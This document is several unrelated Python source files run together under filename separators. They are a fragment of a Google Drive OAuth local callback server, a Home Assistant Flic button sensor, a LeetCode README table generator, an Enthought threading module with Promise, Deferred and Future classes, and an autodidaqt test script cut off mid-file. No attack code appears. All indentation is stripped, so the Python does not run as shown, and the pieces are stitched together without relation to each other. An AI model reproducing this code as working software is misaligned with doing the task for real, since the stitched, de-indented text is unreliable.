# GET /?code=4/clwm0rESq8sqeC-JxIcfiSdjh2593hLej9CZxAcbe1A HTTP/1.1
#
# Use Python to parse the request. We need to add one newline for the
# line and another for a subsequent blank line to terminate the block
# and conform with the RFC.
hr = _HTTPRequest(self.requestline + "\n\n")
u = urllib.parse.urlparse(hr.path)
arguments = urllib.parse.parse_qs(u.query)
# It's not an authorization response. Bail with the same error
# the library would normally send for unhandled requests.
if 'code' not in arguments:
self.send_error(
501,
"Unsupported method ({}): {}".format(
self.command, hr.path))
return
authcode = arguments['code'][0]
_LOGGER.debug("Received authcode [{}]".format(authcode))
monitor._authcode = authcode
monitor._request_state_e.set()
self.send_response(200, message='OK')
self.send_header("Content-type", 'text/html')
self.end_headers()
self.wfile.write("""\
<html>
<head></head>
<body>
GDFS authorization recorded.
</body>
</html>
""")
def log_message(self, format, *args):
pass
class Server(socketserver.TCPServer):
def server_activate(self, *args, **kwargs):
r = socketserver.TCPServer.server_activate(self, *args, **kwargs)
# Sniff the port, now that we're running.
monitor._port = self.server_address[1]
return r
# Our little webserver. (0) for the port will automatically assign it
# to some unused port.
binding = ('localhost', 0)
self.__s = Server(binding, Handler)
_LOGGER.debug("Created server.")
# Signal the startup routine that we're starting.
self.__server_state_e.set()
_LOGGER.debug("Running server.")
self.__s.serve_forever()
_LOGGER.debug("Webserver is stopping.")
# Signal the startup routine that we're stopping.
self.__server_state_e.set()
@property
def port(self):
assert \
self._port is not None, \
"Thread hasn't been started or a port hasn't been assigned."
return self._port
@property
def request_state_e(self):
return self._request_state_e
@property
def authcode(self):
return self._authcode
class AutoAuth(object):
"""Knows how to open the browser, authorize the application (prompting the
user if necessary), redirect, receive the response, and store the
credentials.
"""
def get_and_write_creds(self):
_LOGGER.info("Requesting authorization.")
creds_filepath = gdrivefs.conf.Conf.get('auth_cache_filepath')
wm = _WebserverMonitor(creds_filepath)
# Start the webserver.
wm.start()
# Open a browser window to request authorization.
redirect_uri = 'http://localhost:{}'.format(wm.port)
oa = gdrivefs.oauth_authorize.OauthAuthorize(
redirect_uri=redirect_uri)
url = oa.step1_get_auth_url()
_LOGGER.debug("Opening browser: [{}]".format(url))
webbrowser.open(url)
# Wait for the response from Google. We implement this as a loop rather
# than a blocking call so that the user can terminate this with a
# simple break (in contract, blocking on an event makes us
# unresponsive).
try:
while 1:
if wm.request_state_e.is_set() is True:
break
time.sleep(1)
except:
raise
else:
authcode = wm.authcode
finally:
# Shutdown the webserver.
wm.stop()
# Finish the authorization from our side and record.
oa.step2_doexchange(authcode)
_LOGGER.info("Authorization complete.")
|
binary_sensor.py | """Support to use flic buttons as a binary sensor."""
import logging
import threading
from pyflic import (
ButtonConnectionChannel,
ClickType,
ConnectionStatus,
FlicClient,
ScanWizard,
ScanWizardResult,
)
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import (
CONF_DISCOVERY,
CONF_HOST,
CONF_PORT,
CONF_TIMEOUT,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 3
CLICK_TYPE_SINGLE = "single"
CLICK_TYPE_DOUBLE = "double"
CLICK_TYPE_HOLD = "hold"
CLICK_TYPES = [CLICK_TYPE_SINGLE, CLICK_TYPE_DOUBLE, CLICK_TYPE_HOLD]
CONF_IGNORED_CLICK_TYPES = "ignored_click_types"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 5551
EVENT_NAME = "flic_click"
EVENT_DATA_NAME = "button_name"
EVENT_DATA_ADDRESS = "button_address"
EVENT_DATA_TYPE = "click_type"
EVENT_DATA_QUEUED_TIME = "queued_time"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_DISCOVERY, default=True): cv.boolean,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_IGNORED_CLICK_TYPES): vol.All(
cv.ensure_list, [vol.In(CLICK_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the flic platform."""
# Initialize flic client responsible for
# connecting to buttons and retrieving events
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
discovery = config.get(CONF_DISCOVERY)
try:
client = FlicClient(host, port)
except ConnectionRefusedError:
_LOGGER.error("Failed to connect to flic server")
return
def new_button_callback(address):
"""Set up newly verified button as device in Home Assistant."""
setup_button(hass, config, add_entities, client, address)
client.on_new_verified_button = new_button_callback
if discovery:
start_scanning(config, add_entities, client)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, lambda event: client.close())
# Start the pyflic event handling thread
threading.Thread(target=client.handle_events).start()
def get_info_callback(items):
"""Add entities for already verified buttons."""
addresses = items["bd_addr_of_verified_buttons"] or []
for address in addresses:
setup_button(hass, config, add_entities, client, address)
# Get addresses of already verified buttons
client.get_info(get_info_callback)
def start_scanning(config, add_entities, client):
"""Start a new flic client for scanning and connecting to new buttons."""
scan_wizard = ScanWizard()
def scan_completed_callback(scan_wizard, result, address, name):
"""Restart scan wizard to constantly check for new buttons."""
if result == ScanWizardResult.WizardSuccess:
_LOGGER.info("Found new button %s", address)
elif result != ScanWizardResult.WizardFailedTimeout:
_LOGGER.warning(
"Failed to connect to button %s. Reason: %s", address, result
)
# Restart scan wizard
start_scanning(config, add_entities, client)
scan_wizard.on_completed = scan_completed_callback
client.add_scan_wizard(scan_wizard)
def setup_button(hass, config, add_entities, client, address):
"""Set up a single button device."""
timeout = config.get(CONF_TIMEOUT)
ignored_click_types = config.get(CONF_IGNORED_CLICK_TYPES)
button = FlicButton(hass, client, address, timeout, ignored_click_types)
_LOGGER.info("Connected to button %s", address)
add_entities([button])
class FlicButton(BinarySensorDevice):
"""Representation of a flic button."""
def __init__(self, hass, client, address, timeout, ignored_click_types):
"""Initialize the flic button."""
self._hass = hass
self._address = address
self._timeout = timeout
self._is_down = False
self._ignored_click_types = ignored_click_types or []
self._hass_click_types = {
ClickType.ButtonClick: CLICK_TYPE_SINGLE,
ClickType.ButtonSingleClick: CLICK_TYPE_SINGLE,
ClickType.ButtonDoubleClick: CLICK_TYPE_DOUBLE,
ClickType.ButtonHold: CLICK_TYPE_HOLD,
}
self._channel = self._create_channel()
client.add_connection_channel(self._channel)
def _create_channel(self):
"""Create a new connection channel to the button."""
channel = ButtonConnectionChannel(self._address)
channel.on_button_up_or_down = self._on_up_down
# If all types of clicks should be ignored, skip registering callbacks
if set(self._ignored_click_types) == set(CLICK_TYPES):
return channel
if CLICK_TYPE_DOUBLE in self._ignored_click_types:
# Listen to all but double click type events
channel.on_button_click_or_hold = self._on_click
elif CLICK_TYPE_HOLD in self._ignored_click_types:
# Listen to all but hold click type events
channel.on_button_single_or_double_click = self._on_click
else:
# Listen to all click type events
channel.on_button_single_or_double_click_or_hold = self._on_click
return channel
@property
def name(self):
"""Return the name of the device."""
return f"flic_{self.address.replace(':', '')}"
@property
def address(self):
"""Return the bluetooth address of the device."""
return self._address
@property
def is_on(self):
"""Return true if sensor is on."""
return self._is_down
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {"address": self.address}
def _queued_event_check(self, click_type, time_diff):
"""Generate a log message and returns true if timeout exceeded."""
time_string = f"{time_diff:d} {'second' if time_diff == 1 else 'seconds'}"
if time_diff > self._timeout:
_LOGGER.warning(
"Queued %s dropped for %s. Time in queue was %s",
click_type,
self.address,
time_string,
)
return True
_LOGGER.info(
"Queued %s allowed for %s. Time in queue was %s",
click_type,
self.address,
time_string,
)
return False
def _on_up_down(self, channel, click_type, was_queued, time_diff):
"""Update device state, if event was not queued."""
if was_queued and self._queued_event_check(click_type, time_diff):
return
self._is_down = click_type == ClickType.ButtonDown
self.schedule_update_ha_state()
def _on_click(self, channel, click_type, was_queued, time_diff):
"""Fire click event, if event was not queued."""
# Return if click event was queued beyond allowed timeout
if was_queued and self._queued_event_check(click_type, time_diff):
return
# Return if click event is in ignored click types
hass_click_type = self._hass_click_types[click_type]
if hass_click_type in self._ignored_click_types:
return
self._hass.bus.fire(
EVENT_NAME,
{
EVENT_DATA_NAME: self.name,
EVENT_DATA_ADDRESS: self.address,
EVENT_DATA_QUEUED_TIME: time_diff,
EVENT_DATA_TYPE: hass_click_type,
},
)
def _connection_status_changed(self, channel, connection_status, disconnect_reason):
"""Remove device, if button disconnects."""
if connection_status == ConnectionStatus.Disconnected:
_LOGGER.warning(
"Button (%s) disconnected. Reason: %s", self.address, disconnect_reason
)
|
table_of_solutions.py | #!/usr/bin/env python3.8
# -*- coding: UTF-8 -*-
# 生成用于README.md文件的解法文件目录
# 通过扫描src的子文件夹,解析文件名,生成Markdown规范的文件
import abc
import datetime
import enum
import hashlib
import re
import sys
from contextlib import contextmanager
from typing import *
import git
def info(message, *args):
print(message % args, file=sys.stdout)
def warn(message, *args):
print(message % args, file=sys.stderr)
def error(message, *args):
print(message % args, file=sys.stderr)
class Language(enum.Enum):
""" 代表解法使用的编程语言 """
Kotlin = enum.auto()
Java = enum.auto()
Python = enum.auto()
MySQL = enum.auto()
Bash = enum.auto()
class Metadata:
""" 代表LeetCode API获取的一道题目的元信息
:type id: int
:type frontend_id: str
:type title: str
:type slug: str
:type difficulty: int
:type site_url: str
"""
def __init__(self, metadata):
self.id = metadata[0]
""" 题号 """
self.frontend_id = metadata[1]
""" 界面上展示的题号 """
self.title = metadata[2]
""" 题目名字 """
self.slug = metadata[3]
""" 用于URL中的英文名 """
self.difficulty = metadata[4]
""" 题目难度 """
self.site_url = f"https://leetcode-cn.com/problems/{self.slug}/"
""" 问题的网址 """
def __repr__(self) -> str:
return f"Id.{self.id}: [{self.slug}] {self.title} {'★' * self.difficulty}"
class Solution:
""" 代表一道题目的一个解法
:type problem_no: int
:type category: Language
:type solution: str
:type last_upd: datetime.datetime
"""
def __init__(self, metadata_):
self.problem_no = metadata_[0]
""" 所解的题目 """
self.category = metadata_[1]
""" 使用语言 """
self.solution = metadata_[2]
""" 文件在项目中的相对路径 """
self.last_upd = metadata_[3]
""" 文件最后更新时间 """
def __repr__(self) -> str:
return f"No.{self.problem_no}: [{self.category}] {self.solution} @ {self.last_upd}"
class Problem:
""" 代表一道LeetCode题目
:type ordinal: int
:type display: str
:type solutions: list of Solution
:type metadata: Metadata or None
"""
def __init__(self, metadata_):
self.ordinal = metadata_[0]
""" 真实序号 """
self.display = metadata_[1]
""" 题目名字 """
self.solutions = []
""" 已实现的解法 """
self.metadata = None
""" 题目关联的元信息 """
@property
def site_url(self) -> Optional[str]:
""" 题目的网址 """
if self.metadata:
return self.metadata.site_url
else:
return None
def __eq__(self, o: object) -> bool:
if not isinstance(o, self.__class__):
return False
return self.ordinal == o.ordinal
def __hash__(self) -> int:
return self.ordinal
def __repr__(self) -> str:
return f"No.{self.ordinal}: {self.display} ({len(self.solutions)})"
def __lt__(self, o: object) -> bool:
if not isinstance(o, Problem):
return False
return self.ordinal < o.ordinal
def scan_for_problems():
solutions: Dict[int, Problem] = {}
# [question, problem]
repo = git.Repo('.')
def scan_for_solutions_internal(root_tree, what_todo):
"""
:type root_tree: git.Tree
:type what_todo: (git.Blob) -> None
"""
for blob in root_tree:
if not blob.name.startswith('.'):
what_todo(blob)
def scan_language_dir(tree):
"""
:type tree: git.Blob | git.Tree
"""
if not isinstance(tree, git.Tree):
return
if search := re.search(r"#(\d+) (.+)", tree.name):
ordinal = int(search.group(1))
problem = search.group(2)
else:
return
if ordinal not in solutions:
problem = solutions[ordinal] = Problem((ordinal, problem,))
scan_for_solutions_internal(
tree, lambda p: scan_solution_file(problem, p))
def scan_solution_file(problem, blob):
"""
:type problem: Problem
:type blob: git.Blob | git.Tree
"""
if not isinstance(blob, git.Blob):
return
commit = next(repo.iter_commits(paths=blob.path, max_count=1))
category = resolve_language(blob.name)
filepath = blob.path
last_upd = commit.authored_datetime
if category is None:
warn("Cannot resolve language category for %s", filepath)
return
solution = Solution((problem.ordinal, category, filepath, last_upd))
problem.solutions.append(solution)
def resolve_language(file_name: str):
return next(iter([v for k, v in {
'.java' : Language.Java,
'.kt' : Language.Kotlin,
'.py' : Language.Python,
'.bash.sh' : Language.Bash,
'.mysql.sql': Language.MySQL,
}.items() if file_name.endswith(k)]), None)
@contextmanager
def fetch_metadata_from_remote():
import threading
metadata: Dict[int, Metadata] = {}
def thread_function(sink: Dict[int, Metadata]):
import requests
resp = requests.get("https://leetcode-cn.com/api/problems/all")
for stat_obj in resp.json()["stat_status_pairs"]:
stat = stat_obj["stat"]
diff = stat_obj["difficulty"]
sink[stat["question_id"]] = Metadata((
stat["question_id"],
stat["frontend_question_id"],
stat["question__title"],
stat["question__title_slug"],
diff["level"],
))
future = threading.Thread(target=thread_function, args=(metadata,))
future.start()
yield
future.join()
for problem in solutions.values():
if (data := metadata.get(problem.ordinal, None)) is not None:
problem.metadata = data
else:
error("could not found metadata for %s", problem)
with fetch_metadata_from_remote():
scan_for_solutions_internal(repo.tree() / 'solution', scan_language_dir)
return sorted(solutions.values())
class MarkdownTableGenerator:
"""
Markdown Table Generator
:type table: MarkdownTableGenerator.ElasticTable
:type links: list of MarkdownTableGenerator.MarkdownLink
"""
def __init__(self, problems: Iterable[Problem]):
self.table = self.ElasticTable(
("No.", "Id.", "Name", "Solutions", "Last Update"))
self.links = list()
self.pad_column = True
""" 在元素左右两边添加一个空格 """
for problem in problems:
if not problem.solutions:
error("No solution found for %s", problem.display)
continue
def for_frontend(p: Problem):
""" 生成 No. 这列的文本 """
if p.metadata is None:
return "-"
ordinal = p.metadata.frontend_id
link = self.OrdinalLink(
problem=p,
text=ordinal,
label=f"p{ordinal}",
href=p.site_url, )
self.links.append(link)
return link.render_in_table()
def for_ordinal(p: Problem):
""" 生成 Id. 这列的文本 """
if p.metadata is None :
return str(p.ordinal)
else:
return str(p.metadata.id)
def for_problem(p: Problem):
""" 生成 Name 这列的文本 """
return p.display
def for_solution(s: Solution):
""" 生成 Solutions 这列的文本 """
link = self.SolutionLink(
solution=s,
text=s.category.name,
label=f"#{s.problem_no} {s.category.name.lower()}",
href=s.solution, )
self.links.append(link)
return link.render_in_table()
# some string conversions.
self.table.add_row((
for_frontend(problem),
for_ordinal(problem),
for_problem(problem),
"<br/>".join(map(for_solution, problem.solutions)),
max([s.last_upd for s in problem.solutions]).strftime(
"%Y-%m-%d %H:%M"),
))
class ElasticTable:
""" 可自适应宽度的表格
:type header: tuple[str]
:type column: int
:type widths: tuple[int]
:type bodies: list[tuple[str]]
"""
def __init__(self, header):
self.header = header
""" 表格标题 """
self.column = len(header)
""" 列数 """
self.widths = tuple(len(s) for s in self.header)
""" 各列的宽度 """
self.bodies = list()
""" 表格的内容 不包括标题、分隔行 """
def add_row(self, row: Tuple[str, ...]):
assert len(row) == self.column
width_calculator = len
self.widths = tuple(
max(old, width_calculator(new)) for old, new in
zip(self.widths, row))
self.bodies.append(row)
def __repr__(self) -> str:
return f"{dict(zip(self.header, self.widths))}({len(self.bodies)})"
class MarkdownLink(abc.ABC):
""" Markdown Link reference ::
[text][label]
[label]: destination
https://github.github.com/gfm/#link-reference-definition
:type text: str
:type label: str
:type destination: str
"""
def __init__(self, *, text, label, href):
self.text = text
""" 可见文字 """
self.label = label
""" 内部标志 """
self.destination = href
""" 目标地址 """
def render_in_table(self):
return f"[{self.text}][{self.label}]"
def render_in_footer(self):
import urllib.parse
return f"[{self.label}]: {urllib.parse.quote(self.destination)}"
def __repr__(self) -> str:
return self.destination
def __str__(self) -> str:
return f"[{self.text}][{self.label}]: {self.destination}"
class SolutionLink(MarkdownLink):
""" Solution Link reference
:type solution: Solution
"""
def __init__(self, solution, *, text, label, href):
super().__init__(text=text, label=label, href=href)
self.solution = solution
""" 指向的解法对象 """
class ProblemLink(MarkdownLink):
""" Problem Link reference
deprecated, 不在题目名上放链接,放在序号上
:type problem: Problem
"""
def __init__(self, problem, *, text, label, href):
super().__init__(text=text, label=label, href=href)
self.problem = problem
""" 指向的解法对象 """
def render_in_footer(self):
return f"[{self.label}]: {self.destination}"
class OrdinalLink(MarkdownLink):
""" Ordinal Link reference
:type problem: Problem
"""
def __init__(self, problem, *, text, label, href):
super().__init__(text=text, label=label, href=href)
self.problem = problem
""" 指向的解法对象 """
def render_in_footer(self):
return f"[{self.label}]: {self.destination}"
def generate(self):
lines = []
links = []
pad = 2 if self.pad_column else 0
def p_fix_join(s: Iterable[str]):
""" Append prefix and postfix to string """
return "|".join(('', *s, ''))
def print_header():
lines.append(p_fix_join(
col.center(max(w, w + pad))
for col, w in zip(self.table.header, self.table.widths)))
def print_separator():
lines.append(p_fix_join(
"-" * max(w, w + pad)
for w in self.table.widths))
def print_rows():
lines.extend(p_fix_join(
col.ljust(w).center(max(w, w + pad))
for col, w in zip(row, self.table.widths))
for row in self.table.bodies)
def print_links():
def link_sorter_key(link: 'MarkdownTableGenerator.MarkdownLink'):
if isinstance(link, self.OrdinalLink):
return 0, link.problem.ordinal
if isinstance(link, self.ProblemLink):
return 0, link.problem.ordinal
if isinstance(link, self.SolutionLink):
return link.solution.category.value, \
link.solution.problem_no
sorted_links = sorted(self.links, key=link_sorter_key)
links.extend(
link.render_in_footer()
for link in sorted_links)
print_header()
print_separator()
print_rows()
print_links()
return lines, links
def inplace_replace_readme_file(generator) -> bool:
""" 按需更新README.md文件
:type generator: ()-> tuple[list[str], list[str]]
:return 实际更新了没
"""
file_hash = content_hasher()
gens_hash = content_hasher()
start_mark = '<!-- table of solutions -->'
end_mark = '<!-- end of table of solutions -->'
with open('README.md', 'r') as reader:
processing = False
processed = False
file_lines = []
for line in reader:
file_hash += line
if start_mark in line and line.startswith('<'):
processing = True
elif not processing:
file_lines.append(line)
elif end_mark in line:
processing = False
processed = True
(lines, links) = generator()
def new_line(s):
return s + "\n"
file_lines.append(new_line(start_mark))
file_lines.extend(map(new_line, lines))
file_lines.append("\n")
file_lines.extend(map(new_line, links))
file_lines.append(new_line(end_mark))
else:
if not processed:
error("No %s found in README.md", start_mark)
exit(1)
if processing:
error("No %s found in README.md", end_mark)
exit(1)
gens_hash += file_lines
if file_hash == gens_hash:
info("File content not changed, no writing is preformed.")
return False
with open('README.md', 'w') as writer:
writer.writelines(file_lines)
return True
# noinspection PyPep8Naming
class content_hasher:
def __init__(self) -> None:
self._md5 = hashlib.md5()
def __iadd__(self, other):
if isinstance(other, bytes):
self._md5.update(other)
if isinstance(other, str):
self._md5.update(other.encode())
elif isinstance(other, Iterable):
for element in other:
self.__iadd__(element)
return self
def __eq__(self, other):
return isinstance(other, content_hasher) and \
self._md5.digest() == other._md5.digest()
def __hash__(self) -> int:
return hash(self._md5.digest())
def main():
""" Main entry point.
Other file could import and call this function."""
inplace_replace_readme_file(
lambda: MarkdownTableGenerator(scan_for_problems()).generate())
if __name__ == '__main__':
main()
|
concurrent.py | #
#
# (C) Copyright 2013-2016 Enthought, Inc., Austin, TX
# All right reserved.
#
"""Module to support asynchronous execution of code."""
# System library imports.
try:
from __builtin__ import unicode as utext
except ImportError:
from builtins import str as utext
import sys
from threading import Thread, RLock
from functools import wraps
# Enthought library imports.
from traits.api import (HasTraits, Any, Range, Undefined, Instance, Str,
Property, Enum, ReadOnly, DelegatesTo, Event)
def set_trait_later(obj, trait, value):
from ..utils import gui
gui.set_trait_later(obj, trait, value)
################################################################################
# `Signal` class.
################################################################################
class Signal(HasTraits):
""" A very simple object signal emitted with only one argument.
Very similar (and inspired by) Qt's Signals, except that this is object
based signal instead of class based descriptor signals, i.e., you don't
need to define signals in the class body, you can directly use Signal
by instantiating a Signal object.
Usage:
------
>>> s = Signal()
>>> def func(arg):
... print 'emitted:', arg
>>> s.connect(func)
>>> s.emit('value')
emitted: value
>>> s.disconnect(func)
"""
_event = Event
def connect(self, listener):
self.on_trait_change(listener, '_event')
def disconnect(self, listener):
self.on_trait_change(listener, '_event', remove=True)
def emit(self, value):
self._event = value
def do_callback(dispatch, callback, *args):
"""Invoke the callback with a suitable dispatch.
"""
if dispatch == 'ui':
from ..utils.gui import invoke_later
invoke_later(callback, *args)
else:
callback(*args)
################################################################################
# `Promise` class.
################################################################################
class Promise(HasTraits):
""" The promise of a deferred operation, which can be used
to add success, failure and progress callbacks for the operation.
The Promise instance has a ``dispatch`` trait which can be set to "same" or
"ui" and if it is set to "ui" all changes and callbacks are made in the GUI
thread.
"""
def __init__(self, **traits):
HasTraits.__init__(self, **traits)
# This should really be a reader-writer lock for performance, but this
# will do for the time being.
self._lock = RLock()
# `Promise` Interface #####################################################
def on_done(self, callback):
""" Add callback for successful completion of the operation.
"""
with self._lock:
status = self._status
if status == "pending":
self.on_trait_change(lambda value: (self._status == 'done')
and callback(self._result),
'_status', dispatch=self.dispatch)
# Release the lock before calling the callback. Status is done so nothing
# will mutate further - we are safe.
if status == "done":
do_callback(self.dispatch, callback, self._result)
def on_error(self, callback):
""" Add callback for failure of the operation.
"""
with self._lock:
status = self._status
if status == "pending":
self.on_trait_change(lambda value: (self._status == 'error')
and callback(self._error),
'_status', dispatch=self.dispatch)
# Release the lock before calling the callback. Status is done so nothing
# will mutate further - we are safe.
if status == "error":
do_callback(self.dispatch, callback, self._error)
def on_progress(self, callback):
""" Add callback for progress of the operation.
"""
with self._lock:
status = self._status
if status == "pending":
self.on_trait_change(lambda value: callback(value),
'_progress', dispatch=self.dispatch)
# Release the lock before calling the callback. Status is done so nothing
# will mutate further - we are safe.
if self._status == 'done':
# If operation is already completed, call with 1.0
do_callback(self.dispatch, callback, self._progress)
#################################
# Traits.
# Dispatch all callbacks either in the same thread or in the UI thread.
dispatch = Enum('same', 'ui')
# Status of the Promise.
status = Property
_status = Enum('pending', 'done', 'error')
def _get_status(self):
with self._lock:
return self._status
# The result, if any.
result = Property
_result = Any(Undefined)
def _get_result(self):
with self._lock:
if self._status == 'pending':
raise ValueError('Promise not completed yet')
else:
return self._result
# The error, if any.
error = Property
_error = Any(Undefined)
def _get_error(self):
with self._lock:
if self._status == 'pending':
raise ValueError('Promise not completed yet')
else:
return self._error
# The progress.
progress = Property
_progress = Range(0.0, 1.0, 0.0)
def _get_progress(self):
with self._lock:
return self._progress
################################################################################
# `Deferred` class.
################################################################################
class Deferred(HasTraits):
""" A Deferred operations which will complete in the future.
Usage:
------
In an asynchronous method which would normally require you to accept a
callback method, you can use the Deferred object to let callers add
callbacks even after making the call, in fact even after the operation
has finished.
The following example illustrates the simplest use of a Future::
def background_job():
deferred = Deferred()
# Some async job which takes a callback
async_background_job(callback=lambda result: deferred.done(result))
return deferred.promise()
def on_job_finished(self, result):
print result
bg_job = background_job()
# bg_job promise can be used add callbacks
bg_job.on_done(on_job_finished)
The advantages of this approach to passing callbacks are:
- ability to add callbacks after the call has been made
- ability to add callbacks even after the function has returned
- pass around promise objects to let others add callacks for the job
This can be useful for example to add a progress feature to
an existing function which would have otherwise needed to add
an extra progress_callback argument.
The Deferred supports two dispatch mechanisms, "same" and "ui" if the
``dispatch`` trait is set to "ui" all attributes are set on the GUI thread
and all callbacks are also called from the UI thread.
Notes:
------
Always return the promise() object for an operation to callers when using
Deferred so that so that they can only add callbacks and not set result.
"""
# `Deferred` Interface ####################################################
def done(self, value):
""" Complete the deferred with success and specified result.
and set the progress to 1.0
"""
if self.dispatch == 'ui':
promise = self.promise
set_trait_later(promise, '_result', value)
set_trait_later(promise, '_progress', 1.0)
set_trait_later(promise, '_status', 'done')
else:
with self.promise._lock:
self.promise._result = value
self.promise._progress = 1.0
self.promise._status = 'done'
def error(self, value):
""" Complete the deferred with failure and specified result. """
if self.dispatch == 'ui':
promise = self.promise
set_trait_later(promise, '_error', value)
set_trait_later(promise, '_status', 'error')
else:
with self.promise._lock:
self.promise._error = value
self.promise._status = 'error'
def progress(self, value):
""" Set the progress of the operation (0 <= value <= 1). """
if self.dispatch == 'ui':
set_trait_later(self.promise, '_progress', value)
else:
with self.promise._lock:
self.promise._progress = value
# Traits ##################################################################
# Dispatch all callbacks either in the same thread or in the UI thread.
dispatch = Enum('same', 'ui')
promise = ReadOnly(Instance(Promise))
def _promise_default(self):
return Promise(dispatch=self.dispatch)
################################################################################
# `Future` class.
################################################################################
class Future(Promise):
"""
This could be used for any long-running call that needs to run on
another thread. The result of the call is stored in the `result` trait.
Accessing the `result` trait will block till the thread completes its task.
The `done` method can be used to check if the thread has completed.
Optional progress information is available in a `progress` trait.
Additional optional information is also available in the `info` trait.
One can also set the ``dispatch`` mode to "ui" in which case all
changes to attributes and callbacks are made on the GUI thread.
The following example illustrates the simplest use of a Future::
>>> import time
>>> x = Future(lambda : time.sleep(1) or 'done')
>>> assert x.done() is False
>>> assert x.result == 'done' # This will block.
Here is a slightly more complex example illustrating the use of the
``f_on_progress`` and ``f_on_status`` callbacks::
>>> def on_progress(future):
... print future.progress
...
>>> def on_status(future):
... if future.status == 'done':
... print future.result
... elif future.status == 'error':
... print future.error
...
>>> def compute(future=None):
... for i in range(5):
... if future is not None:
... future.info = str(i)
... future.progress = (i+1)*0.2
... time.sleep(0.1)
... return 'done'
...
>>> x = Future(compute, f_on_status=on_status,
... f_on_progress=on_progress, future_kw='future')
>>> for i in range(5):
... print x.progress, x.info
... time.sleep(0.1)
...
>>> print x.result
"""
# Status of the Future.
status = DelegatesTo('promise', 'status')
# The result of the call. When accessed this will block unless the
# thread has finished execution.
result = Property(Any, depends_on='status')
# The exception if any. ``sys.exc_info`` is stored here.
error = DelegatesTo('promise', 'error')
# Progress information.
progress = Property(depends_on='promise._progress')
# Optional information.
info = Str('')
#################################
# Private Traits.
# The thread in which the function is running.
_thread = Instance(Thread)
# The Deferred object for the operation and its promise.
_deferred = Instance(Deferred)
promise = DelegatesTo('_deferred', 'promise')
############################################################################
# `object` interface.
############################################################################
def __init__(self, func, f_on_status=None, f_on_progress=None,
future_kw=None, dispatch='same', args=None, kw=None):
"""Constructor for a Future.
If an exception is raised when the future runs, ``sys.exc_info()``
is stored in the error trait and the ``status`` is set to "error"
Parameters
----------
func : callable
The callable to execute in another thread.
f_on_status : callable
The callable to callback when the status is changed. This function
will be passed the `Future` instance as a single argument.
f_on_progress : callable
The callable to callback when the progress is changed. This function
will be passed the `Future` instance as a single argument.
future_kw : str
The keyword argument of the callable that accepts a `Future`
instance, typically used for progress info.
args : additional args
These are passed on to the callable.
kw : additional keyword args
Passed to the callable, ``func``.
"""
# Set this first.
self.dispatch = dispatch
super(Future, self).__init__()
if f_on_progress is not None:
self.on_progress(lambda value:f_on_progress(self))
if f_on_status:
self.on_done(lambda value:f_on_status(self))
self.on_error(lambda value:f_on_status(self))
# The wrapper function to call in a thread.
def _f(self, *args, **kw):
"""This function is called by the `Thread` instance."""
try:
self._deferred.done(func(*args, **kw))
except:
self._deferred.error(sys.exc_info())
# Pass self to the function if it needs it.
if future_kw is not None and type(future_kw) in (str, utext):
kw[future_kw] = self
args = args or ()
kw = kw or {}
t = Thread(target=_f, args=(self,) + args, kwargs=kw)
self._thread = t
t.daemon = True
t.start()
############################################################################
# `Future` interface.
############################################################################
def done(self):
"""Return True if the future has completed execution."""
return self.promise.status != 'pending'
############################################################################
# `Promise` interface.
############################################################################
def on_done(self, callback):
self.promise.on_done(callback)
def on_error(self, callback):
self.promise.on_error(callback)
def on_progress(self, callback):
self.promise.on_progress(callback)
############################################################################
# Trait handlers.
############################################################################
def _get_result(self):
# _status is synchronized, so copy local to avoid constant lock acquisitions
status = self.promise._status
if status == 'pending':
self._thread.join()
# Status will have switched to "done" or "error"
status = self.promise._status
if status == 'done':
return self.promise.result
else:
return Undefined
def _get_progress(self):
return self.promise.progress
def _set_progress(self, val):
self._deferred.progress(val)
def __deferred_default(self):
return Deferred(dispatch=self.dispatch)
################################################################################
# `threaded` decorator.
################################################################################
def threaded(func=None, f_on_status=None, f_on_progress=None, future_kw=None,
dispatch='same'):
""" A decorator to run a function in a separate thread and return a
`Future` object which will store the results when the function completes.
Parameters
----------
future_kw : str
The keyword argument of the decorated function that accepts a `Future`
instance.
f_on_status : callable
The callable to callback when the status is changed. This function
will be passed the `Future` instance as a single argument.
f_on_progress : callable
The traits handler to callback when the progress is changed. Note
that this is a traits handler.
dispatch : str
The dispatch mechanism to use. One of either 'same' or 'ui'.
Examples
---------
The following examples illustrates its usage::
>>> import time
>>> @threaded
... def compute(x):
... # long running computation
... time.sleep(x)
... return x
>>> a = f(0.5)
>>> b = f(1.0)
>>> print a.result, b.result
>>> @threaded(future_kw='future')
... def compute_with_progress(dt, future):
... for i in range(10):
... time.sleep(dt)
... future.progress = (i+1)*0.1
... return time.time()
...
>>> a = compute_with_progress(0.1)
>>> # Future is automatically passed.
"""
def future_decorator(func, f_on_status=f_on_status,
f_on_progress=f_on_progress,
future_kw=future_kw, dispatch=dispatch):
def _wrapper(*args, **kw):
"""The wrapper function."""
return Future(func, f_on_status, f_on_progress, future_kw,
dispatch, *args, **kw)
return wraps(func)(_wrapper)
if func is None:
return future_decorator
else:
return future_decorator(func, f_on_status, f_on_progress,
future_kw=future_kw, dispatch=dispatch)
|
connect_and_shutdown.py | from multiprocessing import Process
from autodidaqt_common.remote.command import ShutdownCommand
from autodidaqt_common.remote.config import RemoteConfiguration
from autodidaqt.core import CommandLineConfig
from autodidaqt.examples.scanning_experiment_revisited import app
from autodidaqt.remote.scheduler import PairScheduler
remote_config = RemoteConfiguration("tcp://127.0.0.1:13133")
class TestScheduler(PairScheduler):
async def run_schedule(self):
await self.shuts_down_normally()
def run():
config = CommandLineConfig(headless=True, remote_config=remote_config)
app.configure_as_headless(config)
app.start()
if __name__ == "__main__":
